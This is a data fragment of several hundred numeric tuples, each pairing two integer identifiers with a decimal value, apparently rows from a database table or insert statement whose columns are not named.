(242, 278802, 1.00331),
(242, 278803, 1.07331),
(242, 278804, 0.98),
(242, 278805, 1.07331),
(242, 278806, 0.98),
(242, 278807, 0.93331),
(242, 278808, 1.05),
(242, 278809, 0.98),
(242, 278810, 1.05),
(242, 278811, 1.00331),
(242, 278812, 1.09669),
(242, 278813, 1.14331),
(242, 278814, 0.95669),
(242, 278815, 1.05),
(242, 278816, 0.93331),
(242, 278817, 1.14331),
(242, 278818, 0.91),
(242, 278819, 0.98),
(242, 278820, 1.02669),
(242, 278821, 1.26),
(242, 278822, 0.98),
(242, 278823, 0.95669),
(242, 278824, 1.09669),
(242, 278825, 0.95669),
(242, 278826, 1.07331),
(242, 278827, 0.46662),
(242, 278828, 1.77338),
(242, 278829, 1.02669),
(242, 278830, 0.98),
(242, 278831, 1.07331),
(242, 278832, 1.14331),
(242, 278833, 0.91),
(242, 278834, 1.02669),
(242, 278835, 1.09669),
(242, 278836, 1.19),
(242, 278837, 0.98),
(242, 278838, 0.93331),
(242, 278839, 1.05),
(242, 278840, 0.32669),
(242, 278841, 0.93331),
(242, 278842, 1.05),
(242, 278843, 0.95669),
(242, 278844, 1.00331),
(242, 278845, 0.98),
(242, 278846, 1.07331),
(243, 282303, 1.07331),
(243, 282304, 1.02669),
(243, 282305, 1.28331),
(243, 282306, 1.19),
(243, 282307, 1.07331),
(243, 282308, 1.14331),
(243, 282309, 0.93331),
(243, 282310, 1.00331),
(243, 282311, 0.88669),
(304, 282311, 0.88669),
(243, 282312, 0.93331),
(243, 282313, 0.98),
(243, 282314, 0.98),
(243, 282315, 1.00331),
(243, 282316, 0.98),
(243, 282317, 1.02669),
(243, 282318, 1.12),
(243, 282319, 1.00331),
(243, 282320, 0.95669),
(243, 282321, 0.95669),
(243, 282322, 0.98),
(243, 282323, 1.00331),
(243, 282324, 1.12),
(243, 282325, 1.00331),
(243, 282326, 0.98),
(243, 282327, 1.07331),
(243, 282328, 0.81669),
(243, 282329, 0.91),
(243, 282330, 0.93331),
(243, 282331, 1.07331),
(243, 282332, 0.91),
(243, 282333, 1.00331),
(243, 282334, 0.91),
(243, 282335, 0.98),
(243, 282336, 1.00331),
(243, 282337, 1.82),
(243, 282338, 0.98),
(243, 282339, 1.07331),
(243, 282340, 0.88669),
(243, 282341, 1.00331),
(243, 282342, 0.65338),
(243, 282343, 0.98),
(243, 282344, 1.23669),
(243, 282345, 0.93331),
(243, 282346, 1.09669),
(243, 282347, 0.91),
(243, 282348, 0.98),
(243, 282349, 1.05),
(243, 282350, 1.19),
(243, 282351, 1.14331),
(243, 282352, 1.02669),
(243, 282353, 0.98),
(243, 282354, 1.05),
(243, 282355, 1.02669),
(244, 284153, 0.42),
(244, 284154, 1.02669),
(244, 284155, 1.12),
(244, 284156, 1.86662),
(244, 284157, 1.00331),
(244, 284158, 1.05),
(244, 284159, 0.91),
(244, 284160, 1.05),
(244, 284161, 0.95669),
(244, 284162, 1.12),
(244, 284163, 1.02669),
(244, 284164, 1.09669),
(244, 284165, 1.02669),
(244, 284166, 1.09669),
(244, 284167, 3.36),
(244, 284168, 1.05),
(244, 284169, 1.05),
(244, 284170, 1.05),
(244, 284171, 1.00331),
(244, 284172, 0.86331),
(244, 284173, 0.95669),
(244, 284174, 0.95669),
(244, 284175, 1.07331),
(244, 284176, 0.91),
(244, 284177, 0.93331),
(244, 284178, 0.93331),
(244, 284179, 0.98),
(244, 284180, 0.95669),
(244, 284181, 1.09669),
(244, 284182, 0.95669),
(244, 284183, 1.07331),
(244, 284184, 1.00331),
(244, 284185, 1.07331),
(244, 284186, 1.12),
(244, 284187, 0.93331),
(244, 284188, 1.05),
(244, 284189, 0.95669),
(244, 284190, 1.12),
(245, 284984, 0.93331),
(245, 284985, 1.02669),
(245, 284986, 0.91),
(245, 284987, 1.02669),
(245, 284988, 8.16981),
(245, 284989, 0.91),
(245, 284990, 0.98),
(245, 284991, 0.84),
(245, 284992, 0.95669),
(245, 284993, 0.86331),
(245, 284994, 0.95669),
(245, 284995, 0.93331),
(245, 284996, 1.09669),
(245, 284997, 0.93331),
(245, 284998, 1.05),
(245, 284999, 0.93331),
(245, 285000, 1.12),
(245, 285001, 8.74688),
(245, 285002, 1.09669),
(245, 285003, 0.86331),
(306, 285003, 0.86331),
(245, 285004, 1.07331),
(245, 285005, 0.91),
(245, 285006, 1.07331),
(245, 285007, 0.86331),
(245, 285008, 0.98),
(245, 285009, 0.88669),
(245, 285010, 0.95669),
(245, 285011, 0.91),
(245, 285012, 1.02669),
(245, 285013, 0.95669),
(245, 285014, 1.07331),
(245, 285015, 0.95669),
(246, 285689, 1.00331),
(246, 285690, 1.16669),
(246, 285691, 0.98),
(246, 285692, 1.05),
(246, 285693, 0.93331),
(246, 285694, 1.02669),
(246, 285695, 0.32669),
(246, 285696, 0.95669),
(246, 285697, 1.02669),
(246, 285698, 0.32669),
(246, 285699, 0.93331),
(246, 285700, 1.07331),
(246, 285701, 0.88669),
(246, 285702, 1.05),
(246, 285703, 0.84),
(246, 285704, 0.95669),
(292, 285705, 0.86331),
(246, 285705, 6.90648),
(246, 285706, 3.82676),
(246, 285707, 1.86662),
(246, 285708, 0.98),
(246, 285709, 1.07331),
(246, 285710, 1.05),
(246, 285711, 1.16669),
(246, 285712, 0.93331),
(246, 285713, 1.07331),
(246, 285714, 0.86331),
(246, 285715, 0.95669),
(246, 285716, 1.07331),
(246, 285717, 1.12),
(246, 285718, 1.00331),
(246, 285719, 1.09669),
(246, 285720, 1.86662),
(246, 285721, 1.02669),
(246, 285722, 1.05),
(247, 286650, 1.23669),
(247, 286651, 1.4),
(247, 286652, 0.98),
(247, 286653, 1.16669),
(247, 286654, 1.00331),
(247, 286655, 0.93331),
(247, 286656, 1.02669),
(247, 286657, 1.91338),
(247, 286658, 1.00331),
(247, 286659, 1.05),
(247, 286660, 1.00331),
(247, 286661, 0.95669),
(247, 286662, 0.95669),
(247, 286663, 0.88669),
(247, 286664, 0.98),
(248, 287610, 0.95669),
(248, 287611, 1.09669),
(248, 287612, 0.95669),
(248, 287613, 1.02669),
(248, 287614, 1.07331),
(248, 287615, 0.95669),
(248, 287616, 0.98),
(248, 287617, 1.12),
(248, 287618, 1.00331),
(248, 287619, 1.02669),
(290, 287619, 1.02669),
(248, 287620, 8.36019),
(248, 287621, 0.88669),
(248, 287622, 0.98),
(248, 287623, 0.95669),
(248, 287624, 1.02669),
(248, 287625, 0.93331),
(248, 287626, 1.14331),
(248, 287627, 0.86331),
(248, 287628, 1.07331),
(248, 287629, 0.81669),
(248, 287630, 0.88669),
(248, 287631, 1.02669),
(249, 288659, 0.91),
(249, 288660, 1.00331),
(249, 288661, 0.98),
(249, 288662, 1.26),
(249, 288663, 1.05),
(249, 288664, 1.21331),
(249, 288665, 0.88669),
(249, 288666, 1.00331),
(249, 288667, 0.95669),
(306, 288667, 0.95669),
(249, 288668, 1.05),
(306, 288668, 1.05),
(249, 288669, 1.02669),
(249, 288670, 1.00331),
(249, 288671, 1.07331),
(249, 288672, 0.95669),
(249, 288673, 0.88669),
(249, 288674, 0.98),
(249, 288675, 1.07331),
(249, 288676, 1.14331),
(251, 289438, 0.14),
(251, 289439, 0.86331),
(251, 289440, 1.02669),
(251, 289441, 0.14),
(251, 289442, 0.93331),
(251, 289443, 1.09669),
(251, 289444, 7.41),
(251, 289445, 8.36019),
(251, 289446, 7.41),
(251, 289447, 8.36019),
(252, 289837, 0.95669),
(252, 289838, 1.02669),
(252, 289839, 0.93331),
(252, 289840, 1.02669),
(252, 289841, 0.95669),
(252, 289842, 0.93331),
(252, 289843, 0.98),
(252, 289844, 1.00331),
(252, 289845, 0.95669),
(252, 289846, 1.09669),
(252, 289847, 0.95669),
(252, 289848, 0.91),
(252, 289849, 0.88669),
(252, 289850, 1.00331),
(252, 289851, 1.00331),
(253, 290933, 0.79331),
(253, 290934, 0.95669),
(253, 290935, 0.86331),
(253, 290936, 0.93331),
(253, 290937, 0.93331),
(253, 290938, 1.09669),
(253, 290939, 0.93331),
(253, 290940, 0.98),
(253, 290941, 0.86331),
(253, 290942, 0.98),
(253, 290943, 0.93331),
(253, 290944, 1.05),
(253, 290945, 0.86331),
(253, 290946, 0.91),
(253, 290947, 0.91),
(253, 290948, 0.95669),
(253, 290949, 1.02669),
(253, 290950, 1.02669),
(253, 290951, 1.12),
(253, 290952, 1.00331),
(253, 290953, 1.02669),
(253, 290954, 1.09669),
(253, 290955, 1.00331),
(253, 290956, 0.28),
(253, 290957, 0.98),
(253, 290958, 1.09669),
(253, 290959, 0.93331),
(253, 290960, 1.02669),
(253, 290961, 1.12),
(253, 290962, 0.98),
(253, 290963, 0.93331),
(253, 290964, 1.05),
(253, 290965, 0.95669),
(253, 290966, 1.05),
(253, 290967, 0.95669),
(253, 290968, 0.93331),
(253, 290969, 1.07331),
(253, 290970, 0.98),
(253, 290971, 1.82),
(253, 290972, 1.00331),
(253, 290973, 0.98),
(254, 292147, 0.42),
(254, 292148, 1.12),
(254, 292149, 1.19),
(254, 292150, 2.19338),
(254, 292151, 1.16669),
(254, 292152, 1.21331),
(254, 292153, 0.95669),
(254, 292154, 1.00331),
(254, 292155, 1.86662),
(254, 292156, 1.05),
(254, 292157, 1.23669),
(254, 292158, 0.86331),
(254, 292159, 1.09669),
(254, 292160, 1.00331),
(254, 292161, 0.98),
(254, 292162, 1.00331),
(254, 292163, 0.88669),
(254, 292164, 1.02669),
(254, 292165, 1.00331),
(254, 292166, 1.05),
(254, 292167, 1.16669),
(254, 292168, 0.95669),
(254, 292169, 1.00331),
(254, 292170, 0.81669),
(254, 292171, 0.95669),
(254, 292172, 0.98),
(254, 292173, 1.09669),
(254, 292174, 0.98),
(254, 292175, 1.09669),
(254, 292176, 2.66007),
(254, 292177, 1.02669),
(254, 292178, 0.95669),
(254, 292179, 1.00331),
(254, 292180, 1.12),
(254, 292181, 1.05),
(254, 292182, 1.07331),
(254, 292183, 1.02669),
(254, 292184, 0.98),
(254, 292185, 0.23331),
(254, 292186, 0.88669),
(254, 292187, 0.98),
(254, 292188, 0.95669),
(254, 292189, 0.98),
(254, 292190, 1.00331),
(254, 292191, 0.37331),
(254, 292192, 0.98),
(254, 292193, 1.12),
(254, 292194, 0.98),
(254, 292195, 1.09669),
(254, 292196, 0.95669),
(254, 292197, 1.09669),
(254, 292198, 0.93331),
(254, 292199, 1.05),
(255, 292891, 0.95669),
(255, 292892, 1.05),
(255, 292893, 1.14331),
(304, 292893, 1.14331),
(255, 292894, 0.95669),
(255, 292895, 1.00331),
(255, 292896, 0.91),
(255, 292897, 1.02669),
(255, 292898, 1.00331),
(255, 292899, 0.98),
(255, 292900, 0.95669),
(255, 292901, 1.09669),
(256, 293511, 1.02669),
(256, 293512, 1.00331),
(256, 293513, 1.02669),
(256, 293514, 1.00331),
(256, 293515, 1.09669),
(256, 293516, 0.95669),
(256, 293517, 1.02669),
(256, 293518, 1.02669),
(256, 293519, 1.21331),
(256, 293520, 0.86331),
(256, 293521, 0.98),
(256, 293522, 1.02669),
(256, 293523, 1.07331),
(256, 293524, 0.95669),
(256, 293525, 0.65338),
(256, 293526, 0.93331),
(256, 293527, 1.05),
(256, 293528, 1.12),
(256, 293529, 1.23669),
(256, 293530, 1.14331),
(256, 293531, 1.02669),
(256, 293532, 1.02669),
(256, 293533, 0.93331),
(256, 293534, 1.00331),
(256, 293535, 1.09669),
(256, 293536, 0.91),
(256, 293537, 1.00331),
(257, 294480, 0.98),
(257, 294481, 1.19),
(257, 294482, 0.95669),
(257, 294483, 1.07331),
(257, 294484, 0.95669),
(257, 294485, 0.95669),
(257, 294486, 1.00331),
(257, 294487, 0.93331),
(257, 294488, 0.95669),
(257, 294489, 0.93331),
(257, 294490, 1.00331),
(257, 294491, 1.00331),
(257, 294492, 0.95669),
(257, 294493, 1.07331),
(257, 294494, 0.95669),
(257, 294495, 0.93331),
(257, 294496, 1.07331),
(257, 294497, 1.19),
(257, 294498, 0.93331),
(257, 294499, 1.02669),
(258, 295533, 0.88669),
(258, 295534, 1.02669),
(258, 295535, 1.07331),
(258, 295536, 0.91),
(258, 295537, 1.02669),
(258, 295538, 0.93331),
(258, 295539, 0.84),
(258, 295540, 1.07331),
(258, 295541, 0.91),
(258, 295542, 1.02669),
(258, 295543, 0.95669),
(258, 295544, 1.02669),
(258, 295545, 0.98),
(258, 295546, 1.09669),
(258, 295547, 1.00331),
(258, 295548, 1.07331),
(258, 295549, 0.84),
(258, 295550, 0.95669),
(258, 295551, 1.02669),
(258, 295552, 0.91),
(258, 295553, 1.02669),
(258, 295554, 0.88669),
(258, 295555, 1.02669),
(258, 295556, 0.91),
(258, 295557, 1.07331),
(258, 295558, 0.91),
(258, 295559, 1.23669),
(258, 295560, 0.86331),
(258, 295561, 0.95669),
(258, 295562, 0.91),
(258, 295563, 1.19),
(258, 295564, 0.98),
(258, 295565, 0.93331),
(258, 295566, 1.14331),
(258, 295567, 0.28),
(258, 295568, 0.91),
(258, 295569, 0.98),
(258, 295570, 0.91),
(258, 295571, 0.98),
(261, 296675, 0.93331),
(261, 296676, 1.00331),
(261, 296677, 1.00331),
(261, 296678, 1.14331),
(261, 296679, 1.05),
(261, 296680, 1.02669),
(261, 296681, 0.98),
(261, 296682, 0.86331),
(261, 296683, 1.07331),
(261, 296684, 0.93331),
(261, 296685, 1.05),
(261, 296686, 0.93331),
(262, 297821, 0.98),
(262, 297822, 1.07331),
(262, 297823, 0.51331),
(262, 297824, 1.07331),
(262, 297825, 1.16669),
(262, 297826, 1.02669),
(262, 297827, 0.98),
(262, 297828, 1.12),
(262, 297829, 0.93331),
(262, 297830, 1.05),
(262, 297831, 0.95669),
(262, 297832, 0.98),
(262, 297833, 1.09669),
(262, 297834, 0.95669),
(262, 297835, 2.05338),
(262, 297836, 0.79331),
(262, 297837, 0.91),
(262, 297838, 1.00331),
(262, 297839, 1.00331),
(262, 297840, 1.00331),
(262, 297841, 1.07331),
(262, 297842, 0.95669),
(304, 297842, 0.95669),
(262, 297843, 0.98),
(262, 297844, 1.19),
(262, 297845, 0.86331),
(262, 297846, 0.93331),
(262, 297847, 0.91),
(262, 297848, 1.00331),
(262, 297849, 0.98),
(262, 297850, 1.07331),
(262, 297851, 0.95669),
(262, 297852, 1.02669),
(262, 297853, 2.00662),
(262, 297854, 2.14662),
(262, 297855, 0.91),
(262, 297856, 1.02669),
(262, 297857, 0.93331),
(262, 297858, 1.05),
(262, 297859, 1.07331),
(262, 297860, 1.00331),
(263, 299777, 0.88669),
(263, 299778, 1.07331),
(263, 299779, 0.98),
(263, 299780, 1.07331),
(263, 299781, 0.93331),
(263, 299782, 1.00331),
(263, 299783, 0.98),
(263, 299784, 1.05),
(263, 299785, 0.91),
(263, 299786, 1.12),
(263, 299787, 0.98),
(263, 299788, 0.93331),
(263, 299789, 0.98),
(263, 299790, 1.07331),
(263, 299791, 1.00331),
(263, 299792, 1.12),
(263, 299793, 0.98),
(263, 299794, 1.30669),
(263, 299795, 1.96),
(263, 299796, 2.1),
(263, 299797, 0.86331),
(263, 299798, 0.93331),
(263, 299799, 0.88669),
(263, 299800, 0.98),
(263, 299801, 0.86331),
(263, 299802, 0.93331),
(263, 299803, 0.95669),
(263, 299804, 1.21331),
(263, 299805, 1.05),
(263, 299806, 0.86331),
(287, 299806, 0.86331),
(263, 299807, 0.95669),
(263, 299808, 0.95669),
(263, 299809, 1.00331),
(263, 299810, 0.37331),
(263, 299811, 1.14331),
(263, 299812, 1.30669),
(263, 299813, 0.91),
(263, 299814, 1.00331),
(264, 300597, 0.93331),
(264, 300598, 1.12),
(264, 300599, 0.95669),
(264, 300600, 1.14331),
(264, 300601, 0.42),
(264, 300602, 1.02669),
(264, 300603, 1.21331),
(264, 300604, 0.98),
(264, 300605, 0.91),
(264, 300606, 1.05),
(264, 300607, 0.98),
(264, 300608, 1.07331),
(264, 300609, 0.91),
(264, 300610, 1.09669),
(264, 300611, 1.02669),
(264, 300612, 1.19),
(264, 300613, 1.02669),
(264, 300614, 1.12),
(264, 300615, 0.93331),
(264, 300616, 1.07331),
(264, 300617, 0.88669),
(264, 300618, 1.16669),
(264, 300619, 0.93331),
(264, 300620, 1.02669),
(264, 300621, 1.05),
(264, 300622, 0.91),
(264, 300623, 1.02669),
(267, 301288, 1.00331),
(267, 301289, 1.09669),
(267, 301290, 1.02669),
(267, 301291, 0.95669),
(267, 301292, 0.91),
(267, 301293, 1.05),
(267, 301294, 1.09669),
(267, 301295, 0.88669),
(267, 301296, 0.86331),
(267, 301297, 0.93331),
(267, 301298, 0.88669),
(267, 301299, 0.98),
(267, 301300, 0.86331),
(267, 301301, 0.98),
(267, 301302, 0.88669),
(267, 301303, 0.98),
(267, 301304, 0.91),
(267, 301305, 0.98),
(267, 301306, 0.95669),
(267, 301307, 1.05),
(267, 301308, 0.91),
(267, 301309, 1.21331),
(267, 301310, 1.00331),
(267, 301311, 1.16669),
(267, 301312, 0.93331),
(267, 301313, 1.16669),
(268, 302331, 1.00331),
(268, 302332, 1.09669),
(268, 302333, 1.07331),
(268, 302334, 1.14331),
(268, 302335, 0.84),
(268, 302336, 1.09669),
(268, 302337, 0.86331),
(268, 302338, 1.00331),
(268, 302339, 1.09669),
(268, 302340, 1.21331),
(268, 302341, 0.93331),
(268, 302342, 1.05),
(268, 302343, 0.93331),
(268, 302344, 0.95669),
(268, 302345, 0.95669),
(268, 302346, 1.05),
(268, 302347, 0.91),
(268, 302348, 0.81669),
(268, 302349, 0.91),
(268, 302350, 0.93331),
(268, 302351, 1.00331),
(268, 302352, 0.88669),
(268, 302353, 1.05),
(268, 302354, 0.91),
(268, 302355, 0.98),
(268, 302356, 0.95669),
(268, 302357, 0.91),
(268, 302358, 1.05),
(268, 302359, 0.91),
(268, 302360, 1.02669),
(268, 302361, 0.95669),
(268, 302362, 1.19),
(268, 302363, 0.95669),
(268, 302364, 1.09669),
(268, 302365, 0.88669),
(268, 302366, 1.07331),
(268, 302367, 0.86331),
(268, 302368, 0.95669),
(268, 302369, 0.84),
(268, 302370, 0.95669),
(268, 302371, 1.77338),
(268, 302372, 1.09669),
(268, 302373, 1.00331),
(268, 302374, 0.84),
(268, 302375, 1.00331),
(268, 302376, 0.95669),
(268, 302377, 2.1),
(268, 302378, 0.86331),
(268, 302379, 0.95669),
(269, 303275, 0.37331),
(269, 303276, 0.95669),
(269, 303277, 1.07331),
(269, 303278, 1.00331),
(306, 303278, 1.00331),
(269, 303279, 0.93331),
(269, 303280, 0.98),
(269, 303281, 1.86662),
(269, 303282, 0.98),
(269, 303283, 1.00331),
(269, 303284, 0.95669),
(269, 303285, 1.02669),
(269, 303286, 0.95669),
(269, 303287, 1.05),
(269, 303288, 1.02669),
(269, 303289, 0.91),
(269, 303290, 1.00331),
(269, 303291, 1.91338),
(269, 303292, 1.05),
(269, 303293, 1.05),
(272, 303963, 0.88669),
(272, 303964, 1.14331),
(272, 303965, 1.02669),
(274, 304386, 1.09669),
(274, 304387, 1.21331),
(274, 304388, 0.98),
(274, 304389, 1.09669),
(274, 304390, 2.66007),
(274, 304391, 2.79993),
(274, 304392, 1.00331),
(274, 304393, 0.98),
(274, 304394, 1.00331),
(274, 304395, 1.16669),
(274, 304396, 1.02669),
(274, 304397, 0.88669),
(274, 304398, 0.98),
(274, 304399, 0.95669),
(274, 304400, 1.00331),
(274, 304401, 0.95669),
(274, 304402, 0.88669),
(274, 304403, 0.98),
(274, 304404, 0.37331),
(274, 304405, 0.98),
(274, 304406, 1.05),
(274, 304407, 1.00331),
(274, 304408, 1.09669),
(274, 304409, 0.93331),
(274, 304410, 0.88669),
(305, 304410, 0.88669),
(274, 304411, 1.12),
(274, 304412, 0.86331),
(274, 304413, 0.98),
(274, 304414, 0.91),
(274, 304415, 1.02669),
(274, 304416, 1.00331),
(274, 304417, 1.05),
(274, 304418, 1.02669),
(274, 304419, 1.05),
(274, 304420, 1.16669),
(274, 304421, 1.86662),
(274, 304422, 1.07331),
(274, 304423, 1.05),
(274, 304424, 0.09331),
(274, 304425, 0.93331),
(274, 304426, 1.14331),
(275, 305309, 1.00331),
(275, 305310, 1.19),
(275, 305311, 1.07331),
(275, 305312, 1.09669),
(275, 305313, 1.28331),
(275, 305314, 8.96),
(275, 305315, 10.24),
(275, 305316, 0.98),
(275, 305317, 1.21331),
(275, 305318, 0.95669),
(275, 305319, 1.23669),
(275, 305320, 0.93331),
(306, 305320, 0.93331),
(275, 305321, 1.12),
(275, 305322, 1.86662),
(275, 305323, 1.02669),
(275, 305324, 1.05),
(275, 305325, 0.86331),
(275, 305326, 1.00331),
(275, 305327, 1.02669),
(275, 305328, 1.14331),
(275, 305329, 1.12),
(275, 305330, 0.95669),
(275, 305331, 1.14331),
(275, 305332, 0.98),
(275, 305333, 8.74688),
(275, 305334, 0.98),
(275, 305335, 1.09669),
(275, 305336, 0.86331),
(275, 305337, 0.98),
(275, 305338, 0.95669),
(275, 305339, 1.05),
(275, 305340, 1.12),
(275, 305341, 1.07331),
(275, 305342, 1.16669),
(275, 305343, 0.98),
(275, 305344, 0.93331),
(305, 305344, 0.93331),
(275, 305345, 1.02669),
(275, 305346, 1.09669),
(275, 305347, 1.16669),
(275, 305348, 0.93331),
(275, 305349, 1.02669),
(275, 305350, 1.02669),
(275, 305351, 1.12),
(275, 305352, 0.37331),
(275, 305353, 0.98),
(275, 305354, 1.19),
(275, 305355, 1.02669),
(275, 305356, 0.93331),
(275, 305357, 1.02669),
(275, 305358, 0.93331),
(275, 305359, 1.02669),
(280, 307603, 0.32669),
(280, 307604, 1.12),
(280, 307605, 1.19),
(287, 312919, 0.81669),
(287, 312920, 0.95669),
(287, 312921, 0.86331),
(287, 312922, 1.05),
(287, 312923, 1.05),
(287, 312924, 1.02669),
(287, 312925, 0.86331),
(287, 312926, 1.00331),
(287, 312927, 1.02669),
(287, 312928, 1.19),
(287, 312929, 0.88669),
(287, 312930, 0.93331),
(287, 312931, 0.91),
(288, 313678, 1.00331),
(288, 313679, 1.96),
(288, 313680, 1.23669),
(288, 313681, 1.19),
(288, 313682, 1.14331),
(288, 313683, 1.00331),
(288, 313684, 1.12),
(288, 313685, 0.95669),
(288, 313686, 0.98),
(288, 313687, 1.07331),
(288, 313688, 1.05),
(288, 313689, 0.98),
(288, 313690, 0.98),
(288, 313691, 1.09669),
(288, 313692, 0.98),
(288, 313693, 0.95669),
(288, 313694, 1.21331),
(288, 313695, 0.88669),
(288, 313696, 0.98),
(288, 313697, 0.98),
(288, 313698, 0.98),
(288, 313699, 0.93331),
(288, 313700, 1.05),
(288, 313701, 0.88669),
(288, 313702, 0.95669),
(288, 313703, 0.86331),
(288, 313704, 1.07331),
(288, 313705, 0.86331),
(288, 313706, 0.93331),
(288, 313707, 1.07331),
(288, 313708, 0.93331),
(288, 313709, 1.00331),
(288, 313710, 0.88669),
(288, 313711, 0.98),
(290, 315609, 0.88669),
(290, 315610, 1.14331),
(290, 315611, 0.93331),
(290, 315612, 1.02669),
(290, 315613, 1.00331),
(290, 315614, 1.09669),
(290, 315615, 0.93331),
(306, 315615, 0.93331),
(290, 315616, 0.91),
(290, 315617, 1.02669),
(290, 315618, 1.12),
(290, 315619, 0.93331),
(290, 315620, 1.05),
(290, 315621, 0.98),
(290, 315622, 1.05),
(290, 315623, 0.86331),
(290, 315624, 0.95669),
(290, 315625, 0.37331),
(290, 315626, 0.98),
(290, 315627, 1.19),
(290, 315628, 0.95669),
(290, 315629, 1.07331),
(290, 315630, 0.88669),
(290, 315631, 1.00331),
(290, 315632, 0.86331),
(290, 315633, 1.07331),
(290, 315634, 1.05),
(290, 315635, 1.14331),
(290, 315636, 0.98),
(290, 315637, 1.07331),
(290, 315638, 0.88669),
(290, 315639, 0.98),
(292, 317784, 1.05),
(292, 317785, 1.12),
(292, 317786, 1.23669),
(292, 317787, 0.91),
(292, 317788, 1.02669),
(292, 317789, 1.14331),
(292, 317790, 0.98),
(292, 317791, 1.07331),
(292, 317792, 1.14331),
(292, 317793, 0.84),
(292, 317794, 0.93331),
(292, 317795, 0.98),
(292, 317796, 0.93331),
(292, 317797, 1.05),
(292, 317798, 1.05),
(292, 317799, 1.00331),
(306, 317799, 1.00331),
(292, 317800, 0.98),
(292, 317801, 0.98),
(292, 317802, 0.88669),
(292, 317803, 0.98),
(292, 317804, 0.84),
(292, 317805, 0.95669),
(292, 317806, 1.86662),
(292, 317807, 0.28),
(292, 317808, 0.95669),
(292, 317809, 1.16669),
(292, 317810, 1.00331),
(292, 317811, 1.05),
(292, 317812, 0.91),
(292, 317813, 0.91),
(292, 317814, 0.98),
(292, 317815, 0.98),
(292, 317816, 0.98),
(292, 317817, 0.51331),
(292, 317818, 1.07331),
(292, 317819, 1.12),
(292, 317820, 0.88669),
(292, 317821, 0.93331),
(292, 317822, 0.98),
(292, 317823, 1.14331),
(292, 317824, 0.18669),
(295, 317824, 0.18669),
(292, 317825, 0.93331),
(295, 317825, 0.93331),
(292, 317826, 1.12),
(292, 317827, 0.91),
(292, 317828, 1.05),
(292, 317829, 1.00331),
(292, 317830, 0.95669),
(292, 317831, 1.02669),
(292, 317832, 0.86331),
(292, 317833, 1.02669),
(292, 317834, 1.00331),
(292, 317835, 1.00331),
(292, 317836, 1.05),
(292, 317837, 0.95669),
(292, 317838, 1.02669),
(292, 317839, 0.98),
(292, 317840, 1.07331),
(294, 318454, 8.74688),
(294, 318455, 9.6),
(295, 318707, 0.91),
(295, 318708, 1.05),
(295, 318709, 1.07331),
(295, 318710, 0.93331),
(295, 318711, 0.88669),
(295, 318712, 1.00331),
(295, 318713, 0.95669),
(295, 318714, 1.07331),
(295, 318715, 0.28),
(295, 318716, 0.93331),
(295, 318717, 1.02669),
(295, 318718, 0.28),
(295, 318719, 0.98),
(295, 318720, 1.16669),
(295, 318721, 1.00331),
(295, 318722, 1.14331),
(295, 318723, 0.56),
(295, 318724, 1.09669),
(295, 318725, 1.23669),
(295, 318726, 0.95669),
(295, 318727, 1.09669),
(295, 318728, 1.12),
(295, 318729, 0.28),
(295, 318730, 1.82),
(295, 318731, 1.07331),
(295, 318732, 1.05),
(298, 320270, 0.98),
(308, 320270, 0.98),
(298, 320271, 0.93331),
(308, 320271, 0.93331),
(298, 320272, 0.98),
(308, 320272, 0.98),
(298, 320273, 1.02669),
(308, 320273, 1.02669),
(298, 320274, 0.95669),
(308, 320274, 0.95669),
(298, 320275, 0.95669),
(308, 320275, 0.95669),
(298, 320276, 1.96),
(308, 320276, 1.96),
(298, 320277, 1.26),
(308, 320277, 1.26),
(298, 320278, 1.19),
(308, 320278, 1.19),
(298, 320279, 1.07331),
(308, 320279, 1.07331),
(298, 320280, 0.98),
(308, 320280, 0.98),
(298, 320281, 0.37331),
(298, 320282, 0.98),
(298, 320283, 1.07331),
(298, 320284, 0.98),
(308, 320284, 0.98),
(298, 320285, 1.21331),
(308, 320285, 1.21331),
(298, 320286, 1.16669),
(308, 320286, 1.16669),
(298, 320287, 0.98),
(308, 320287, 0.98),
(298, 320288, 1.09669),
(308, 320288, 1.09669),
(298, 320289, 0.93331),
(308, 320289, 0.93331),
(298, 320290, 1.14331),
(308, 320290, 1.14331),
(299, 321214, 0.98),
(299, 321215, 1.12),
(299, 321216, 0.86331),
(299, 321217, 1.00331),
(299, 321218, 0.98),
(299, 321219, 0.95669),
(299, 321220, 1.02669),
(299, 321221, 0.86331),
(299, 321222, 0.95669),
(299, 321223, 0.93331),
(299, 321224, 1.14331),
(299, 321225, 0.93331),
(299, 321226, 1.00331),
(299, 321227, 0.98),
(299, 321228, 0.91),
(299, 321229, 0.98),
(299, 321230, 1.07331),
(299, 321231, 0.98),
(299, 321232, 1.00331),
(299, 321233, 0.86331),
(299, 321234, 0.91),
(299, 321235, 1.14331),
(299, 321236, 0.93331),
(299, 321237, 1.02669),
(299, 321238, 0.91),
(299, 321239, 1.02669),
(299, 321240, 1.00331),
(299, 321241, 1.09669),
(299, 321242, 1.00331),
(299, 321243, 1.00331),
(299, 321244, 0.98),
(299, 321245, 1.12),
(299, 321246, 0.86331),
(299, 321247, 0.95669),
(299, 321248, 0.84),
(299, 321249, 0.98),
(299, 321250, 0.98),
(299, 321251, 1.16669),
(299, 321252, 0.93331),
(299, 321253, 1.02669),
(299, 321254, 0.86331),
(299, 321255, 1.05),
(299, 321256, 1.07331),
(299, 321257, 0.91),
(299, 321258, 1.00331),
(299, 321259, 1.09669),
(299, 321260, 1.19),
(299, 321261, 0.84),
(299, 321262, 0.98),
(304, 324369, 0.95669),
(305, 324369, 0.95669),
(304, 325226, 1.07331),
(304, 325227, 1.07331),
(304, 325228, 0.98),
(304, 325229, 1.23669),
(304, 325230, 0.88669),
(304, 325231, 4.10676),
(304, 325232, 1.28331),
(304, 325233, 1.12),
(304, 325234, 1.14331),
(304, 325235, 1.12),
(304, 325236, 0.98),
(304, 325237, 1.00331),
(304, 325238, 0.81669),
(304, 325239, 1.19),
(304, 325240, 0.65338),
(304, 325241, 0.91),
(304, 325242, 1.07331),
(304, 325243, 0.95669),
(304, 325244, 1.05),
(304, 325245, 0.84),
(304, 325246, 0.93331),
(304, 325247, 0.91),
(304, 325248, 0.98),
(304, 325249, 0.98),
(305, 326377, 0.88669),
(305, 326378, 0.93331),
(305, 326379, 0.91),
(305, 326380, 1.16669),
(305, 326381, 0.86331),
(305, 326382, 0.93331),
(305, 326383, 1.02669),
(305, 326384, 1.00331),
(305, 326385, 0.95669),
(305, 326386, 0.91),
(305, 326387, 1.00331),
(305, 326388, 0.86331),
(305, 326389, 1.12),
(305, 326390, 1.05),
(305, 326391, 1.19),
(305, 326392, 1.05),
(305, 326393, 1.16669),
(305, 326394, 1.00331),
(305, 326395, 1.09669),
(305, 326396, 0.98),
(305, 326397, 1.07331),
